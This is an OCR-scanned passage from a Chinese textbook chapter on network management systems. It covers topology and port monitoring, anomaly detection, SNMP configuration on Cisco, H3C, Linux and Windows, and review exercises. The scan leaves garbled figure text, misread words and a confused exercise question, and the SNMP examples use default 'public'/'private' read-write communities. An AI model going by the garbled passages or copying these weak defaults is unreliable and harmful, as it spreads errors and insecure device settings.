接 的 设备 类 型 ， 可 以 分 方向 和 比例 地 显示 各 种 端口 数据 ， 并 利用 不 同 指标 排序 功能 查看 各 
个 相关 的 端口 数据 ， 以 便 对 端口 进行 对 比 观 察 ， 如 图 11-13 所 示 。 

4) ”终端 接 入 拓扑 图 

一 般 网 络 管理 系统 可 以 通过 读 取 交 换 机 MAC 地 址 表 来 自动 定位 交换 机 端口 下 的 所 有 
终端 ， 并 以 拓扑 图 的 方式 展示 交换 机 端口 和 各 终端 之 间 的 连接 关系 ， 实 时 显示 终端 的 流量 
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和 状态 ， 使 终端 和 布线 系统 可 视 化 ， 定 位 问题 直达 网 络 末端 ， 如 图 11-14 所 示 。 


村 
有 中 中 中 中 中 旺旺 旺旺 中 旺旺 中 


图 11-13 设备 端口 视图 


ET -= 


图 11-14 入 网 计算 机 拓扑 图 

5) ”IP/MAC 地 址 自动 建 档 和 更 新 

网 络 管理 系统 可 以 自动 搜集 网 络 中 所 有 入 网 计算 机 的 信息 并 建立 一 个 档案 库 。 系 统 以 
MAC 地 址 作为 入 网 计算 机 的 唯一 标识 符 。 系 统 提供 的 入 网 计算 机 识别 信息 包括 : IP 地 
址 、MAC 地 址 、 上 连 设备 端口 、Windows 计算 机 名 、Windows 域 组 名 、Windows 用 户 登 
录 名 6 项 。 这 些 信息 可 以 识别 和 定位 一 台 计 算 机 。JP 地 址 、MAC 地 址 提供 了 入 网 计算 机 
的 地 址 信息 ;Windows 计算 机 名 、Windows 域 组 名 、Windows 用 户 登录 名 提供 了 入 网 计 
算 机 的 Windows 网 络 配 置信 息 ; 上 连 设 备 端口 提供 了 入 网 计算 机 的 设备 连接 信息 。 
经 过 一 段 时 间 的 自动 学 习 和 更 新 ， 系 统 可 以 形成 一 个 完整 的 入 网 计算 机 库 ， 之 后 用 户 

可 以 在 入 网 计算 机 库 中 选择 “上 连 设备 ”，“ 网 段 ” 等 过 滤 选 项 ， 来 查看 具体 的 交换 机 上 
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连接 入 网 计算 机 的 数目 ， 或 者 具体 网 段 瑟 地 址 的 使 用 情况 等 。 
这 一 功能 可 以 帮助 网 管 员 对 于 卫 地 址 的 全 局 使 用 情况 有 一 个 清晰 准确 的 统计 ， 对 于 
JP 地 址 使 用 的 管理 、 分 配 都 可 以 起 到 很 好 的 辅助 作用 。 


2.， 事件 和 日 志 管理 


一 般 网 络 管理 系统 都 支持 主动 轮 询 和 被 动 接收 这 两 种 事件 采集 模式 ， 主 动 轮 询 支持 
ICMP、SNMP 和 NETBIOS 等 协议 ， 被 动 接收 模式 支持 SNMP TRAP 和 SYSLOG 等 协 
议 。 同 时 网 络 管理 系统 还 需要 支持 多 种 报警 方式 ， 例 如 控制 台 、 声 音 、 邮 件 、 短 信 等 ， 具 
有 报警 自动 定 级 、 时 间 压 缩 和 查询 功能 。 采 用 严格 的 指数 回 退 故障 报警 算法 ， 对 一 个 监控 
对 象 按 1、2、4 秒 超时 连续 探测 三 次 方 给 予 报告 ， 有 效 减少 误 报 。 

对 于 记录 的 事件 和 日 志 ， 系 统 可 以 提供 多 种 方式 来 生成 不 同类 型 的 报表 ， 例 如 通过 普 
通报 表 可 以 提供 图 表 和 数据 表 的 结合 ， 可 以 生成 日 报表 、 周 报表 、 月 报表 、 季 报表 、 半 年 
报表 、 年 报表 以 及 灵活 的 自 定义 报表 。 针 对 设备 CPU、 接 口 流量 生成 曲线 图 、 柱 状 图 、 
饼 状 图 。 并 能 对 多 个 设备 或 者 多 个 接口 进行 曲线 图 合并 ， 进 行 横 向 的 性 能 对 比 。 一 般 在 普 
通报 表 定制 界面 上 可 以 进行 灵活 的 字段 定制 ， 例 如 : 

@ ”指定 目标 设备 或 目标 接口 。 
指定 是 否 多 个 设备 或 接口 分 别 出 报表 ， 还 是 多 个 设备 或 接口 出 合并 报表 。 
指定 指标 参数 (CPU 占用 率 、 接 口 流量 等 )。 
指定 报表 涵盖 的 时 间 区 间 。 
指定 制图 的 种 类 (曲线 图 、 柱 状 图 、 饼 状 图 )。 

e@ ”指定 是 否 生成 数据 表格 。 

另外 ， 网 络 管理 系统 的 报表 管理 功能 还 可 以 生成 横向 对 比 报表 ， 如 图 11-15 所 示 ， 这 
种 报表 主要 针对 多 个 指标 数据 在 指定 的 时 间 区 间 内 的 横向 对 比 ， 在 横向 对 比 报表 定制 界面 
中 同样 可 以 进行 灵活 的 报表 内 容 定制 ， 例 如 : 

e 指定 目标 设备 或 目标 接口 。 
指定 是 否 多 个 设备 或 接口 分 别 出 报表 ， 还 是 多 个 设备 或 接口 出 合并 报表 。 
指定 指标 参数 (CPU 占用 率 、 接 口 流 量 等 )。 
指定 要 对 比 的 时 间 点 (如 每 天 的 22 时 、 每 周 的 周一 、 每 月 的 29 日 等 )。 
指定 报表 涵盖 的 时 间 区 间 。 
指定 制图 的 种 类 (曲线 图 、 柱 状 图 )。 
指定 是 否 生 成 数据 表格 。 


. 故障 定位 和 异常 检测 


随 着 互联 网 的 普及 和 网 络 应 用 的 复杂 化 ，ARP 病毒 、 广 播 风暴 、BT 下 载 等 P2P 应 用 
经 常 导致 网 络 拥塞 或 瘫痪 。 网 络 管理 系统 应 该 具有 快速 检测 、 定 位 和 解决 这 些 网 络 异常 问 
题 的 能 力 。 

1) P2P 下 载 

由 于 通常 P2P 下 载 都 会 在 上 下 行 链 路 上 占据 很 大 流量 ， 特 别 是 计算 机 在 下 载 的 同时 ， 
也 被 当 作 一 个 服务 器 ， 网 络 中 的 其 他 计算 机 可 以 从 它 这 里 下 载 数据 ， 因 此 P2P 下 载 时 的 明 


Co 
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显 流量 特征 是 此 计算 机 上 连 的 交换 机 端口 上 下 行 流量 都 非常 大 ， 这 样 就 可 以 通过 有 向 流量 
拓扑 图 来 发 现 这 些 P2P 下 载 流 量 。 


选择 对 tt 时 间 点 


于 Res: 区 扫 可 现 : 项 友 区 3 天。 思 定 时 间 点 ; 15 日 


指标 2 2 


| 可 |CPU 占 用 率 | 端口 流量 


所 
可 选 设备 : 已 选 设备 : 
19216815 ] 192168411 


19216816 > 1921681.2 
19216817 2 19216814 
19216818 1921681254 


11-15 ”横向 对 比 报表 定制 界面 


2) 广播 风暴 

广播 风暴 ， 或 者 说 普通 的 广播 病毒 的 特点 是 向 心 广播 包 数 量 很 大 ， 因 此 要 定位 这 种 病 
毒 ， 首 先 可 以 观察 网 络 流量 拓扑 图 ， 如 果菜 条 链 路 上 向 心 广 播 包 数量 很 大 ， 就 可 以 选中 相 
关 设 备 并 切入 终端 流量 拓扑 图 ， 根 据 向 心 广 播 包 的 显示 来 定位 问题 主机 。 

3) ”ARP 病毒 

一 般 网 络 管理 系统 都 可 以 定位 抢占 IP 地 址 类 型 的 ARP 病毒 ， 即 发 现 “ 一 个 MAC 对 
应 多 个 IP 地 址 ”。 为 了 及 时 发 现 ARP 病毒 的 攻击 ， 系 统 可 在 每 次 扫描 后 生成 ARP 日 
志 。ARP 日 志 根 据 路 由 或 者 三 层 交换 机 中 的 ARP 表 的 数据 ， 生 成 了 -MAC 对 应 关系 。 


11.2.4 SNMP 简单 配置 示例 


任何 网 络 管理 系统 一 般 都 要 使 用 SNMP 协议 来 管理 设备 和 服务 ， 因 此 在 搭建 网 络 管 
理 系统 之 前 ， 都 需要 首先 完成 被 控 对 象 的 SNMP 服务 配置 ， 本 节 就 SNMP 协议 的 配置 进 
行 一 下 简单 介绍 。 


1. 网 络 设备 的 SNMP 配置 


这 里 我 们 以 交换 机 为 例 ， 介 绍 一 下 业界 两 种 IOS 风格 的 SNMP 服务 配置 方法 。 

1) “思科 交换 机 的 SNMP 配置 方法 

交换 机 的 各 种 命令 状态 中 ， 最 常见 的 是 用 户 命令 状态 和 特权 命令 状态 。 

@ Switch>: 用 户 命令 状态 ， 用 户 可 以 看 路 由 器 的 连接 状态 和 一 些 设置 ， 访 问 其 他 
网 络 和 主机 ， 但 不 能 更 改 路 由 器 的 设置 内 容 。 

@ ”Switch#: 在 用 户 命令 状态 下 输入 “enable”， 可 以 进入 特权 命令 状态 ， 此 模式 下 
可 以 看 到 和 更 改 设备 的 配置 。 

配置 SNMP 需要 首先 进入 设备 的 特权 命令 状态 : 
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Switch>enable 
password: xxxxxx // 输 入 口令 
Switch#show run // 此 命令 可 以 看 到 当前 设备 的 IOS 配置 ，SNMP 的 配置 一 般 位 于 


running-configuration 的 最 后 几 行 。 
Switch (config)#snmp-server community [口令 ] [权限 ] 


其 中 community 简单 来 说 就 是 SNMP 的 一 个 口令 ， 只 有 口令 一 致 ， 网 络 管理 软件 才 
能 顺利 地 读 取 数 据 。 后 面 的 权限 有 两 种 : 一 种 是 只 读 权限 read-only， 另 一 种 是 读 写 权限 
read-write。 例 如 : 


Switch (config)#snmp-server community public ro 
Switch (config)#snmp-server community private rw 


如 果 想 从 配置 中 删除 SNMP 配置 ， 则 可 以 使 用 如 下 命令 : 

Switch (config)#no snmp-server community [口令 ] 

对 于 有 些 交换 机 IOS 版 本 来 说 ， 如 果 配 置 了 新 的 SNMP 语句 但 是 没有 取消 旧 的 
SNMP 语句 ， 则 该 两 条 语句 在 配置 中 将 同时 起 作用 。 

2) ”H3C 交换 机 的 SNMP 配置 方法 

首先 进入 H3C 的 系统 配置 模式 : 


<H3C> 用 户 命令 状态 
<H3C>super 

进入 super 模式 ， 权 限 更 高 
<H3C> system-view 


进入 系统 视图 ， 配 置 模式 

同 理 ， 可 以 首先 查看 一 下 当前 运行 的 配置 : 

<H3C>display current-configuration 

配置 设备 的 SNMP 服务 : 

[H3C] snmp-agent community [权限 ] [口令 ] 

同 理 ， 这 里 read 为 只 读 权限 ，write 为 写 权 限 ; [口令 ] 的 位 置 就 是 SNMP 的 
community 字符 串 ， 默 认 read 权限 设置 成 public，write 权限 设置 成 private。 

[H3C] snmp-agent sys-info version all // 打 开 SNMP 的 所 有 版 本 。 

保存 修改 过 的 配置 : 


<H3C>save 
2. 主机 的 SNMP 配置 


这 里 我 们 以 Linux 和 Windows 两 种 操作 系统 为 例 ， 来 介绍 一 下 在 计算 机 /服务 器 主机 
上 的 SNMP 服务 配置 方法 。 

1) ”Linux 系统 上 SNMP 的 配置 方法 

首先 利用 rpm 命令 确认 SNMP 软件 包 是 否 已 经 安装 : 


# rpm -qa lgrep snmp 


然后 进行 SNMP 配置 文件 的 修改 ， 通 常 是 以 root 权限 来 编辑 /etc/snmp/snmpd.conf 文件 : 
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首先 是 定义 一 个 共同 体 名 (community)， 假 设 为 public， 以 及 可 以 访问 这 个 public 的 
用 户 名 (sec.name)， 这 里 假设 是 notConfigUser， 这 样 public 就 相当 于 用 户 notConfigUser 
的 密码 。 

然后 定义 一 个 组 名 (groupName)， 假 设 为 notConfigGroup， 设 定 该 组 的 安全 级 别 ， 并 
把 notConfigUser 这 个 用 户 加 到 这 个 组 中 。 

下 面 开 始 配置 snmp 服务 的 读 写 权 限 ， 定 义 一 个 可 操作 的 范围 (wiew) 名 ， 假 设 为 all， 
范围 是 .1， 并 设置 notConfigUser 这 个 组 在 all 这 个 view 范围 内 可 做 的 操作 ， 此 时 就 定 
义 了 notConfigUser 组 的 成 员 可 对 .1 这 个 MIB 范围 做 只 读 操 作 。 

修改 后 的 /etc/snmp/snmpd.conf 文件 一 般 为 如 下 内 容 : 


1# sec.name source community 
com2sec notConfigUser IP1 public 

com2sec notConfigUser IP2 public 

2# groupName securityModel securityName 
group notConfigGroup vl notConfigUser 
group notConfigGroup v2c notConfigUser 
3# name incl/excl subtree mask (optional 

View systemview included 1 

4# group context 

sec.model sec.level prefix read write notif 
access notConfigGroup 

机 any noauth exact all none none 
保存 退出 


修改 配置 文件 后 ， 还 需要 重启 SNMP 服务 ， 如 下 所 示 : 


# service snmpd restart 


2) ”Windows 系统 上 SNMP 的 配置 方法 

这 里 以 Windows 2003 服务 器 为 例 ， 看 一 下 Windows 系统 上 是 如 何 配置 SNMP 服务 的 。 

首先 ， 需 要 为 Windows 系统 安装 SNMP 服务 ， 依 次 打开 “开始 ”一 “控制 面板 ”一 
“添加 删除 程序 ”一 “添加 /删除 Windows 组 件 ” 一 “管理 和 监视 工具 ”， 选 择 简单 网 络 
管理 协议 (SNMP) 进 行 安装 ， 如 图 11-16 所 示 。 
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ee 
国 二 下 代理 放 可 用 视 了 3 的 活动 世尊 制 和 工作 法 江 - 
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基 术 。 包括 最 各 器 和风 


所 大 瑞生 宝 间 - 所 用 克 衬 宁 间 6 BE 
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11-16 安装 SNMP 协议 
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然后 设置 SNMP 服务 的 团体 名 称 ， 在 桌面 找到 我 的 电脑 ， 右 击 “ 我 的 电脑 ”依次 打 
开 “ 管 理 ” 一 “服务 和 应 用 程序 ”一 “服务 ”一 SNMP Service， 右 击 该 项 打开 “SNMP 
Service 的 属性 ”对 话 框 ， 切 换 到 “陷阱 ”选项 卡 ， 在 “团体 名 称 ” 下 拉 列 表 框 中 填 入 需 
要 配置 的 团体 名 称 ， 如 图 11-17 所 示 。 


本 ce 的 尾 性 (本 地 计算 机) 区 了 


ET 
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最 后 还 需要 为 SNMP 服务 配置 团体 名 称 的 权限 ， 同 样 在 “SNMP Service 的 属性 ”对 
话 框 中 切换 到 “安全 ”选项 卡 ， 然 后 选中 “发 送 身份 验证 陷阱 ” 复 选 框 ， 在 “接受 团体 名 
称 ” 列 表 框 中 单 击 添加 ， 输 入 团体 名 称 后 再 选中 “接受 来 自 这 些 主机 的 SNMP 数据 包 ” 
单 选 按 钮 ， 这 样 就 可 以 只 接受 localhost 的 SNMP 数据 包 了 ， 当 然 也 可 以 添加 其 他 主机 。 
如 果 人 允许 接受 任何 主机 的 SNMP 数据 包 ， 则 需要 选中 “接受 来 自任 何 主机 的 SNMP 数据 
包 ” 单 选 按钮 ， 如 图 11-18 所 示 。 
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11-18 为 SNMP 团体 名 称 配置 权限 
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在 Windows 2003 上 配置 完 SNMP 服务 后 ， 就 可 以 在 网 管 软件 中 用 上 面 定 义 的 团体 名 
称 来 获取 服务 器 的 数据 了 。 


11.3 本 章 小 结 


本 章 首先 讨论 了 网 络 管理 系统 在 整个 IT 环境 中 的 重要 性 和 基本 结构 组 成 ， 及 其 所 具 
有 的 五 大 基本 功能 ， 这 部 分 内 容 有 助 于 读者 快速 了 解 网 络 管理 系统 在 网 络 建设 中 的 地 位 和 
重要 性 。 随 后 我 们 介绍 了 网 络 管理 系统 的 主要 发 展 阶段 ， 并 对 国内 外 一 些 典型 网 络 管理 系 
统 及 其 厂商 进行 了 简单 的 了 解 ， 目 前 国内 网 络 管理 系统 虽然 在 很 多 方面 不 能 与 国际 品牌 相 
比 ， 但 其 实用 性 和 本 地 化 的 服务 使 其 在 市 场 竞争 中 后 来 者 居 上 ， 逐 渐 站 稳 了 国内 市 场 。 在 
本 章 的 最 后 部 分 我 们 向 读者 介绍 了 网 络 管理 系统 的 一 些 典型 功能 ， 旨 在 帮助 读者 从 直观 上 
了 解 网 络 管理 系统 的 使 用 和 功能 特点 。 由 于 各 个 厂家 的 网 络 管理 系统 差异 很 大 ， 读 者 在 进 
行 网 络 管理 系统 的 实施 和 部 署 时 应 参考 具体 的 产品 手册 ， 从 而 掌握 合理 的 配置 和 使 用 
方法 。 


11.4 课 后 习题 


1. 填空 题 

(1) 配置 管理 模块 一 般 具 有 典型 的 功能 是 自动 获取 能 力 、 ” 、 一 致 性 检查 能 
为 = 

(2) 计 费 管理 模块 的 典型 功能 是 、 数 据 管理 与 维护 功能 、 ,分 
析 与 决策 支持 、 计 费 信息 查 询 。 

(3) 网 络 监 控 及 管理 系统 的 发 展 趋势 可 概括 为 智能 化 、 、 易 用 
性 、 、 远 程 管理 。 

(4) 网 络 监 控 管 理 要 求 达到 “5W"， 即 任何 一 个 授权 者 (Whoever)、 无 论 在 任何 时 候 
(Whenever)、 ， 都 能 通过 任何 一 种 手段 (However), 以 获取 的 任 


何 信息 (Whatever)， 形 成 一 个 高 度 智能 化 的 完备 的 监控 网 ， 这 是 未 来 监控 的 理想 模式 和 发 
展 趋势。 

(5) 网 络 管理 系统 在 设计 时 遵循 了 分 层 架 构 设计 的 思想 ， 实 现 数据 采集 、 和 
数据 呈现 三 者 之 间 的 分 离 ， 因 此 通常 分 为 三 个 大 的 层次 ， 即 数据 采集 层 、 数 据 处 理 层 
和 


2. 选择 题 
(1) 性 能 管理 模块 常 包含 典型 的 功能 是 性 能 监控 、 阅 值 管理 、(  )。 

A. 性 能 检测 B. 性 能 分 析 C. 状态 分 析 D. 状态 控制 
(2) 网 络 管理 系统 需要 提供 一 种 通用 的 、(  ”)、 可 扩展 的 框架 体系 。 

A. 可 控 性 B. 完整 性 C. 开放 的 D. 保密 性 


(3) 一 般 网 络 管理 系统 都 支持 主动 轮 询 和 被 动 接收 这 两 种 事件 采集 模式 ， 主 动 轮 询 支 
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持 ICMP、SNMP 和 (  ”) 等 协议 。 
A. NETBIOS B. SNMP TRAP C.SYSLOG D. SNMP RAP 
(4) 思科 交换 机 中 ， 选 择 ( 。”) 用 户 命令 ， 用 户 可 以 查看 路 由 器 的 连接 状态 和 一 些 设 
置 ， 访问 其 他 网 络 和 主机 ， 但 不 能 更 改 路 由 器 的 设置 内 容 。 
A. Switch# B. Switch> C.Ipm D. Switch(config)# 
(5) H3C 交换 机 中 Linux 系统 上 SNMP 的 配置 方法 利用 (  ) 命 令 确 认 SNMP 软件 包 
是 否 已 经 安装 。 


A. super B. system-view 
C. snmp-agent community D. mpm 
3. 判断 题 
(1) 目前 常用 的 网 络 管理 系统 按照 管理 对 象 的 不 同 可 分 为 网 元 管理 软件 和 通用 网 络 管 
理 软件 两 大 类 。 , 旋 


(2) TMN 体系 结构 按照 不 同 的 管理 需求 将 整个 电信 网 管理 功能 从 低 到 高 分 作 5 层 : 
网 元 层 (NEL)、 网 元 管理 层 (EML)、 网 络 管理 层 (NML)、 事 务 管理 层 (BML)、 业 务 管理 层 
(SML). ( ) 
(3) 国外 网 管 产品 而 言 ， 典 型 的 是 IBM Tivoli、HP OpenView 和 EMC Unicenter 三 大 
《 9 
(4) 网 管 软件 的 功能 评测 主要 针对 网 管 功 能 的 完备 性 ， 其 测评 结果 依赖 于 具体 的 使 用 
环境 。 ( ) 

(5) 配置 管理 在 网 络 管理 系统 中 非常 重要 ， 它 往往 用 于 初始 化 网 络 和 配置 网 络 ， 以 使 
其 提供 正常 的 网 络 服务 。 ( ) 


4. 简 答题 

(1) 简 述 安全 管理 模块 保证 其 自身 的 安全 性 的 方式 。 
(2) 数据 采集 的 通用 方法 有 哪些 ? 

(3) 网 管 软件 测评 时 需要 考虑 哪些 方面 ? 

(4) 简 述 网 络 管理 系统 的 测评 方法 。 
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